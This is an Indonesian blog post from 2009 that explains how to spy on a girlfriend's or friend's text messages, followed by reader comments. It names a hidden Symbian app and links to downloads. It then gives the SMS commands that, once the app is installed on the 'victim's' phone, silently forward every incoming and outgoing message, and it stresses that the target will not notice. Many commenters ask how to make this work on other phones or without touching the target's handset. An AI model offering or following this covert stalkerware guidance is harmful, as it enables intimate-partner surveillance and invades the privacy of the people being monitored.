jump to navigation

Sadap SMS Pacar September 18, 2009

Posted by inisyafi in Belajar Ngeblog.
Tags:
trackback

ini adalah trik untuk menyadap ponsel, bisa anda gunakan sebagai mata-mata untuk pacar biar tidak selingkuh. hehehehehehe . oke langsung saja.

syarat:

# HP adalah HP symbian. Baik HP anda maupun HP teman anda.

# Merek NOKIA

# Memiliki aplikasi simbyan smsanywherelite.sis hp korban juga harus sama yah punya aplikasi simbyan smsanywherelite.sis Ikuti instruksi berikut ini untuk menyadap dan sadap sms hp : 1. download smsanywherelite.sis untuk software menyadap.

direct link : http://7c3e65c9.linkbucks.com/?lurl=http%3A%2F%2Fwww.wireless-labs.com%2Fdownload%2FSmsAnywhere_S60_2_0_v_1_4_1.SIS

kalau tidak bisa disitu, silahkan download di :

http://www.ziddu.com/download/3233238/smsanywherelite_s60_2_0_v_1_1_0.sis.zip.html

2. Masukkan aplikasi symbian itu di HP anda dan korban

3. Begitu aplikasi ini diinstal, kamu tidak bisa melihat program maupun ikon aplikasi itu dalam ponsel. Seluruh pengontrolannya harus lewat sms, mulai dari pengaktifan dan mematikan program, mengubah password, hingga pengiriman sms ke ponsel lain. Tapi justru itu keuntungannya jika digunakan sebagai alat sadap. Berarti sang target kan tidak tahu kalau diponselnya telah dipasangi aplikasi tersebut. Justru itu, teman anda tidak akan tahu kan kalo smsnya disadap? Karena aplikasi symbian ini belum mendukung GUI (Graphics User Interface).

4. Siapkan hp/ponsel korban anda

5. Siapkan HP anda yang akan menerima sms masuk dari korban anda.

6. Aktifkan aplikasi ini di ponsel korban kamu dengan mengetik format sms -[ SA(spasi)(password)(spasi)ON ]-. Panjang password maksimal 8 karakter. Misal, jika password kamu adalah 123456, ketikkan SA 123456 ON kirim sms ini ke nomor ponsel kedua/ponsel kamu. Untuk mematikannya, ketik SA 123456 OFF ke nomor yang sama.

7. Lalu, jika anda ingin menyadap lebih dari 5 hari..atau setiap sms masuk di hp korban akan selalu diteruskan ke hp anda, ketik sms ini di hp korban anda : SA(spasi)(password)(spasi)R1, misal SA 1234567 R1. Untuk mematikan fungsi ini ganti parameter di belakang “R” menjadi nol. Jadi, tuliskan SA 1234567 R0. Sedangkan untuk meneruskan setiap sms keluar, kirim sms bertuliskan SA 1234567 S1 ke nomer kamu. Matikan fungsi ini dengan mengirim SMS SA 1234567 S0

8. Sekarang, setiap korban menerima dan mengirim sms..kamu akan mendapat terusannya sama persis dengan sms aslinya

selamat mencoba . . .

suber : http://ruzikagokilz.wordpress.com/

About these ads

Komentar»

1. Bernardia Vitri - September 18, 2009

kalo untuk Java?

2. a - Oktober 25, 2009

kalo untuk java gmana???
please urgent neh…

reply ..

coba ja..
kamu langsung ke TKP..
bisa jalan gak APP tu d HP java..

thnk

3. tam - November 7, 2009

Klw hp’na pcr beda brarti ga bs donk??
Slain nokia bisa ga??misalkan blacberry gituh??bls iah

4. gilang - Desember 5, 2009

ko gw ga bisa ya padahal sama N70…
ngaruh ga ya klo hape ny security phone….

hp gw bisa jadi penyadap lebih dari satu hape ga…?

5. arul - Desember 23, 2009

kalo dengan hp berbeda bisa gak ??
yang satu N73 & satunya lagi S700 ???

Please yaw….

thx.

6. helen - Desember 28, 2009

om kalo pacar kita di luar negri trus dipasangin aplikasi ntu dan semuanya sudah di seting seperti diatas… bisa ga ya…

7. leman - Januari 27, 2010

wah gak bisa blas…gt kok mas…mas…siapa yang dah berhasil ….????? kt pakai 3230/korban.hp n70 mata matai…..reporttttt………………

8. joko - Februari 7, 2010

Saya ngaak bisa tuch, Target pake E63, napa yach, katanya software nggak mendukung, padahal kan symbian

9. zerobeat - Maret 15, 2010

klo udah ada yang berhasil tolong dishare lagi ya..

10. nana daryana - April 24, 2010

bisa ga tanpa hrs install hp target, soalnya jauh boss?

11. januar - Mei 29, 2010

Gimana ya cara kita sadap sms kawan karib…….Thnks

12. harry - Juni 1, 2010

cara nentukan pass nya punya kitanya,

13. harry - Juni 1, 2010

setellah di install kan hilang, menentukan pass kitanya gi mana….

14. SINYO - Juli 16, 2010

BERIKUT ADALAH DAFTAR HANDPHONE YG BISA APLIKASI INI :
Nokia 7650, 3650/3600, 3660/3620, 6600/6620, 7610, 6260, 6630, 6670, 3230, 6680, 6681/6682, N70, N72, N90, N-Gage, N-Gage QD, Siemens SX1, Panasonic X700, X800, Sendo X, X2, Samsung SGH-D700, D710, D720, D730, Z600, Lenovo P930

15. squal - Agustus 11, 2010

cara aktifasinya gimana??? paswortnya di tentukan sndiri atau cari atau gimana? toling s jawab..?

16. Anjay kalem ok - Agustus 13, 2010

Pkok’y hebt dch smua’y,da yg Lbh ok Lg gk nh?

17. Ian - Agustus 15, 2010

ADa yg buat java tak ya? :)

18. sasha - Oktober 6, 2010

blackberry bisa gak???

19. namira - Oktober 6, 2010

kalo hpnya beyond gimana

20. komunitas klaten - November 29, 2010

bagus tuh app bisa dicoba buat yg suka curigaan sm pcr2na

21. bagus_funs - Desember 18, 2010

efek negativy apa ni….

22. abang - Februari 5, 2011

kena pulsa ngak ini

23. wandha - Mei 10, 2011

Ada saran ga klo untuk mengetahui sms yg sdh terlanjur di delete dr hp sementara lokasi sang pacar jauh dr kita?

24. iwan - Mei 16, 2011

kalo hp 5130c bisa tau g ya???

25. sanxalonx - Mei 20, 2011

repot

26. alletang - Juni 26, 2011

kl hape nokia supernova 7210 gak ada ya

27. pusing - Juli 12, 2011

huh,,, apa ga ada yang lebih ribet lagi tanpa libatin hp si korban???
tapi lumayan lah dari pada ga ada

28. asdfghj - Juli 25, 2011

ane sama2 pake 7610.tp kagak bisa gan…..

29. Aplikasi Symbian sadap sms | Ryanfadhilah's Blog - September 30, 2011

[...] https://emge1502.wordpress.com/2009/09/18/sadap-sms-pacar/#com-head Share this:TwitterFacebookLike this:SukaBe the first to like this post. This entry was posted in Aplikasi. Bookmark the permalink. ← Artilkel Hati [...]

30. LintasAndalas - September 30, 2011

Hp saya Galmin sdg Target GT C3322
Bisa gk ya.mohon tggpannya om.trims

31. slamet riyadi - Oktober 3, 2011

bos, mungkin kasusx hampir sama seperti teman2 yg udah posting namun yg saya ingin tanyakan klo target dan saya sama2 jauh bgmn carax trus dia punya nokia 6700s sama x10 kira2 bagaimana. trimksih

32. fransisco - Desember 30, 2011

mas kalau software smsanyware itu ada untuk hp nokia 6300 tdk mas???tlng jwb mas…makasih

33. andre - Juli 8, 2012

kalau untuk java dan android ga ada ya mas ?

34. buy you tube views - Juli 23, 2013

Good respond in return of this question with firm arguments and describing everything regarding
that.


Tinggalkan Balasan

Isikan data di bawah atau klik salah satu ikon untuk log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Logout / Ubah )

Twitter picture

You are commenting using your Twitter account. Logout / Ubah )

Facebook photo

You are commenting using your Facebook account. Logout / Ubah )

Google+ photo

You are commenting using your Google+ account. Logout / Ubah )

Connecting to %s

Ikuti

Get every new post delivered to your Inbox.

%d bloggers like this: